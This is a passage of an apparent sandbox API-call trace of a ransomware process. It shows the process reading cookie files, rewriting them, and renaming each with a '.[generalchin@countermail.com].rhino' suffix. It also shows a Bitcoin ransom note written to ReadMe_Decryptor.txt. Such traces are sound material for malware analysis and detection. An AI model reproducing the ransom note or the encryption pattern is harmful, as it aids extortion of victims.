(in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e8980 | out: hHeap=0x6d0000) returned 1 [0088.886] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x3f) returned 0x6e7438 [0088.886] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72aff8 | out: hHeap=0x6d0000) returned 1 [0088.886] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x5e) returned 0x708d18 [0088.886] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e7438 | out: hHeap=0x6d0000) returned 1 [0088.886] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x8d) returned 0x23b00e0 [0088.886] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x708d18 | out: hHeap=0x6d0000) returned 1 [0088.886] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x186) returned 0x23b0370 [0088.886] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b00e0 | out: hHeap=0x6d0000) returned 1 [0088.886] WriteFile (in: hFile=0x104, lpBuffer=0x23b0370*, nNumberOfBytesToWrite=0x186, lpNumberOfBytesWritten=0x2cfa04, lpOverlapped=0x0 | out: lpBuffer=0x23b0370*, lpNumberOfBytesWritten=0x2cfa04*=0x186, lpOverlapped=0x0) returned 1 [0088.886] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0370 | out: hHeap=0x6d0000) returned 1 [0088.886] UnlockFile (hFile=0x104, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x186, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0088.886] CloseHandle (hObject=0x104) returned 1 [0088.887] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x100) returned 0x23b00e0 [0088.888] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x17e) returned 0x23b0370 [0088.888] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b00e0 | out: hHeap=0x6d0000) returned 1 [0088.888] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@ad13.adfarm1.adition[1].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@ad13.adfarm1.adition[1].txt"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@ad13.adfarm1.adition[1].txt.[generalchin@countermail.com].rhino" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@ad13.adfarm1.adition[1].txt.[generalchin@countermail.com].rhino"), dwFlags=0x2) returned 1 [0088.888] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0370 | out: hHeap=0x6d0000) returned 1 [0088.888] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b01e8 | out: hHeap=0x6d0000) returned 1 [0088.889] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72a920 | out: hHeap=0x6d0000) returned 1 [0088.889] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa0) returned 0x23b00e0 [0088.889] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0048 | out: hHeap=0x6d0000) returned 1 [0088.889] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa0) returned 0x23b0188 [0088.889] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xee) returned 0x23b0230 [0088.889] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0188 | out: hHeap=0x6d0000) returned 1 [0088.889] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\ReadMe_Decryptor.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\readme_decryptor.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x104 [0088.889] lstrlenA (lpString="All your files have been encrypted due to a security problem with your PC. If you want to restore them, write us to the e-mail:\n1)generalchin@countermail.com\n2)generalchin@smime.ninja (if you do not receive a response from the first mailbox)\n\nYou have to pay for decryption in Bitcoins. The price depends on how fast you write to us.\nAfter payment we will send you the decryption tool that will decrypt all your files.\n\nFree decryption as guarantee\nBefore paying you can send us up to 1 files for free decryption.\nThe total size of files must be less than 500 Kb (non archived), and files should not contain valuable information. (databases,backups, large excel sheets, etc.)\n") returned 676 [0088.889] WriteFile (in: hFile=0x104, lpBuffer=0xcb9dd0*, nNumberOfBytesToWrite=0x2a4, lpNumberOfBytesWritten=0x2cfa5c, lpOverlapped=0x0 | out: lpBuffer=0xcb9dd0*, lpNumberOfBytesWritten=0x2cfa5c*=0x2a4, lpOverlapped=0x0) returned 1 [0088.891] CloseHandle (hObject=0x104) returned 1 [0088.892] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0230 | out: hHeap=0x6d0000) returned 1 [0088.892] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@adfarm1.adition[2].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@adfarm1.adition[2].txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x104 [0088.892] GetFileSize (in: hFile=0x104, lpFileSizeHigh=0x2cfa64 | out: lpFileSizeHigh=0x2cfa64*=0x0) returned 0x66 [0088.892] LockFile (hFile=0x104, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x186, nNumberOfBytesToLockHigh=0x0) returned 1 [0088.892] SetFilePointerEx (in: hFile=0x104, liDistanceToMove=0xffffffe0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0088.892] ReadFile (in: hFile=0x104, lpBuffer=0x2cfa24, nNumberOfBytesToRead=0x20, lpNumberOfBytesRead=0x2cfa04, lpOverlapped=0x0 | out: lpBuffer=0x2cfa24*, lpNumberOfBytesRead=0x2cfa04*=0x20, lpOverlapped=0x0) returned 1 [0088.894] SetFilePointerEx (in: hFile=0x104, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0088.895] ReadFile (in: hFile=0x104, lpBuffer=0x9b0040, nNumberOfBytesToRead=0x66, lpNumberOfBytesRead=0x2cfa04, lpOverlapped=0x0 | out: lpBuffer=0x9b0040*, lpNumberOfBytesRead=0x2cfa04*=0x66, lpOverlapped=0x0) returned 1 [0088.895] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x72b7f8 [0088.895] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0088.895] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2c) returned 0x72aff8 [0088.895] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x40) returned 0x6e7438 [0088.895] GetLastError () returned 0x0 [0088.895] SetLastError (dwErrCode=0x0) [0088.895] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72aff8 | out: hHeap=0x6d0000) returned 1 [0088.895] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x66) returned 0x23b0048 [0088.895] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e7438 | out: hHeap=0x6d0000) returned 1 [0088.895] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x100) returned 0x23b0188 [0088.895] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x180) returned 0x23b0290 [0088.895] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0188 | out: hHeap=0x6d0000) returned 1 [0088.895] SetFilePointerEx (in: hFile=0x104, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0088.896] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1) returned 0x72b7f8 [0088.896] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2) returned 0x72b828 [0088.896] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0088.896] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x3) returned 0x72b7f8 [0088.896] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b828 | out: hHeap=0x6d0000) returned 1 [0088.896] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x72b828 [0088.896] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0088.896] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x6) returned 0x72b7f8 [0088.896] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b828 | out: hHeap=0x6d0000) returned 1 [0088.896] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x9) returned 0x6df140 [0088.896] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0088.896] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd) returned 0x6df110 [0088.896] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6df140 | out: hHeap=0x6d0000) returned 1 [0088.896] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x13) returned 0x709e68 [0088.896] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6df110 | out: hHeap=0x6d0000) returned 1 [0088.896] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1c) returned 0x6e8980 [0088.896] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x709e68 | out: hHeap=0x6d0000) returned 1 [0088.896] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2a) returned 0x72aff8 [0088.896] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e8980 | out: hHeap=0x6d0000) returned 1 [0088.896] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x3f) returned 0x6e7438 [0088.896] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72aff8 | out: hHeap=0x6d0000) returned 1 [0088.897] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x5e) returned 0x708d18 [0088.897] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e7438 | out: hHeap=0x6d0000) returned 1 [0088.897] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x8d) returned 0x72a920 [0088.897] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x708d18 | out: hHeap=0x6d0000) returned 1 [0088.897] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x186) returned 0x23b0418 [0088.897] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72a920 | out: hHeap=0x6d0000) returned 1 [0088.897] WriteFile (in: hFile=0x104, lpBuffer=0x23b0418*, nNumberOfBytesToWrite=0x186, lpNumberOfBytesWritten=0x2cfa04, lpOverlapped=0x0 | out: lpBuffer=0x23b0418*, lpNumberOfBytesWritten=0x2cfa04*=0x186, lpOverlapped=0x0) returned 1 [0088.897] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0418 | out: hHeap=0x6d0000) returned 1 [0088.897] UnlockFile (hFile=0x104, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x186, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0088.897] CloseHandle (hObject=0x104) returned 1 [0088.898] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xf0) returned 0x23b0188 [0088.898] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x166) returned 0x23b0418 [0088.898] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0188 | out: hHeap=0x6d0000) returned 1 [0088.898] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@adfarm1.adition[2].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@adfarm1.adition[2].txt"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@adfarm1.adition[2].txt.[generalchin@countermail.com].rhino" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@adfarm1.adition[2].txt.[generalchin@countermail.com].rhino"), dwFlags=0x2) returned 1 [0088.899] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0418 | out: hHeap=0x6d0000) returned 1 [0088.899] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0290 | out: hHeap=0x6d0000) returned 1 [0088.899] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0048 | out: hHeap=0x6d0000) returned 1 [0088.899] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa0) returned 0x23b0188 [0088.899] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b00e0 | out: hHeap=0x6d0000) returned 1 [0088.899] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa0) returned 0x23b0048 [0088.899] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xee) returned 0x23b0230 [0088.899] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0048 | out: hHeap=0x6d0000) returned 1 [0088.899] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\ReadMe_Decryptor.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\readme_decryptor.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0088.899] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0230 | out: hHeap=0x6d0000) returned 1 [0088.900] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@adformdsp[1].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@adformdsp[1].txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x104 [0088.901] GetFileSize (in: hFile=0x104, lpFileSizeHigh=0x2cfa64 | out: lpFileSizeHigh=0x2cfa64*=0x0) returned 0x5d [0088.901] LockFile (hFile=0x104, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x17d, nNumberOfBytesToLockHigh=0x0) returned 1 [0088.901] SetFilePointerEx (in: hFile=0x104, liDistanceToMove=0xffffffe0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0088.902] ReadFile (in: hFile=0x104, lpBuffer=0x2cfa24, nNumberOfBytesToRead=0x20, lpNumberOfBytesRead=0x2cfa04, lpOverlapped=0x0 | out: lpBuffer=0x2cfa24*, lpNumberOfBytesRead=0x2cfa04*=0x20, lpOverlapped=0x0) returned 1 [0088.903] SetFilePointerEx (in: hFile=0x104, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0088.904] ReadFile (in: hFile=0x104, lpBuffer=0x9b0040, nNumberOfBytesToRead=0x5d, lpNumberOfBytesRead=0x2cfa04, lpOverlapped=0x0 | out: lpBuffer=0x9b0040*, lpNumberOfBytesRead=0x2cfa04*=0x5d, lpOverlapped=0x0) returned 1 [0088.904] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x72b7f8 [0088.904] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0088.904] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2c) returned 0x72aff8 [0088.904] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x40) returned 0x6e7438 [0088.904] GetLastError () returned 0x0 [0088.904] SetLastError (dwErrCode=0x0) [0088.904] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72aff8 | out: hHeap=0x6d0000) returned 1 [0088.904] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x5d) returned 0x708d18 [0088.904] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e7438 | out: hHeap=0x6d0000) returned 1 [0088.904] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x100) returned 0x23b0048 [0088.904] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x180) returned 0x23b0230 [0088.904] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0048 | out: hHeap=0x6d0000) returned 1 [0088.904] SetFilePointerEx (in: hFile=0x104, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0088.905] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1) returned 0x72b7f8 [0088.905] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2) returned 0x72b828 [0088.905] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0088.905] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x3) returned 0x72b7f8 [0088.905] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b828 | out: hHeap=0x6d0000) returned 1 [0088.905] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x72b828 [0088.905] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0088.905] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x6) returned 0x72b7f8 [0088.905] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b828 | out: hHeap=0x6d0000) returned 1 [0088.905] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x9) returned 0x6df110 [0088.905] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0088.905] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd) returned 0x6df140 [0088.905] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6df110 | out: hHeap=0x6d0000) returned 1 [0088.905] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x13) returned 0x709e68 [0088.905] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6df140 | out: hHeap=0x6d0000) returned 1 [0088.905] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1c) returned 0x6e8980 [0088.905] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x709e68 | out: hHeap=0x6d0000) returned 1 [0088.905] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2a) returned 0x72aff8 [0088.905] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e8980 | out: hHeap=0x6d0000) returned 1 [0088.905] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x3f) returned 0x6e7438 [0088.905] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72aff8 | out: hHeap=0x6d0000) returned 1 [0088.905] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x5e) returned 0x72a920 [0088.906] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e7438 | out: hHeap=0x6d0000) returned 1 [0088.906] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x17d) returned 0x23b03b8 [0088.906] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72a920 | out: hHeap=0x6d0000) returned 1 [0088.906] WriteFile (in: hFile=0x104, lpBuffer=0x23b03b8*, nNumberOfBytesToWrite=0x17d, lpNumberOfBytesWritten=0x2cfa04, lpOverlapped=0x0 | out: lpBuffer=0x23b03b8*, lpNumberOfBytesWritten=0x2cfa04*=0x17d, lpOverlapped=0x0) returned 1 [0088.906] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b03b8 | out: hHeap=0x6d0000) returned 1 [0088.906] UnlockFile (hFile=0x104, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x17d, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0088.906] CloseHandle (hObject=0x104) returned 1 [0088.907] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xf0) returned 0x23b0048 [0088.907] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x166) returned 0x23b03b8 [0088.907] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0048 | out: hHeap=0x6d0000) returned 1 [0088.907] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@adformdsp[1].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@adformdsp[1].txt"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@adformdsp[1].txt.[generalchin@countermail.com].rhino" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@adformdsp[1].txt.[generalchin@countermail.com].rhino"), dwFlags=0x2) returned 1 [0088.908] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b03b8 | out: hHeap=0x6d0000) returned 1 [0088.908] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0230 | out: hHeap=0x6d0000) returned 1 [0088.908] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x708d18 | out: hHeap=0x6d0000) returned 1 [0088.908] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa0) returned 0x23b0048 [0088.908] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0188 | out: hHeap=0x6d0000) returned 1 [0088.908] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa0) returned 0x23b00f0 [0088.908] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xee) returned 0x23b0198 [0088.908] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b00f0 | out: hHeap=0x6d0000) returned 1 [0088.908] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\ReadMe_Decryptor.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\readme_decryptor.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0088.909] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0198 | out: hHeap=0x6d0000) returned 1 [0088.909] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@adform[1].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@adform[1].txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x104 [0088.917] GetFileSize (in: hFile=0x104, lpFileSizeHigh=0x2cfa64 | out: lpFileSizeHigh=0x2cfa64*=0x0) returned 0xea [0088.917] LockFile (hFile=0x104, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x20a, nNumberOfBytesToLockHigh=0x0) returned 1 [0088.917] SetFilePointerEx (in: hFile=0x104, liDistanceToMove=0xffffffe0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0088.917] ReadFile (in: hFile=0x104, lpBuffer=0x2cfa24, nNumberOfBytesToRead=0x20, lpNumberOfBytesRead=0x2cfa04, lpOverlapped=0x0 | out: lpBuffer=0x2cfa24*, lpNumberOfBytesRead=0x2cfa04*=0x20, lpOverlapped=0x0) returned 1 [0088.918] SetFilePointerEx (in: hFile=0x104, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0088.919] ReadFile (in: hFile=0x104, lpBuffer=0x9b0040, nNumberOfBytesToRead=0xea, lpNumberOfBytesRead=0x2cfa04, lpOverlapped=0x0 | out: lpBuffer=0x9b0040*, lpNumberOfBytesRead=0x2cfa04*=0xea, lpOverlapped=0x0) returned 1 [0088.919] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x72b7f8 [0088.919] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0088.919] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2c) returned 0x72aff8 [0088.919] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x40) returned 0x6e7438 [0088.919] GetLastError () returned 0x0 [0088.919] SetLastError (dwErrCode=0x0) [0088.919] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72aff8 | out: hHeap=0x6d0000) returned 1 [0088.919] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xea) returned 0x23b00f0 [0088.919] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e7438 | out: hHeap=0x6d0000) returned 1 [0088.920] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x100) returned 0x23b01e8 [0088.920] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x180) returned 0x23b02f0 [0088.920] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b01e8 | out: hHeap=0x6d0000) returned 1 [0088.920] SetFilePointerEx (in: hFile=0x104, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0088.920] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1) returned 0x72b7f8 [0088.920] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2) returned 0x72b828 [0088.920] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0088.920] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x3) returned 0x72b7f8 [0088.920] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, 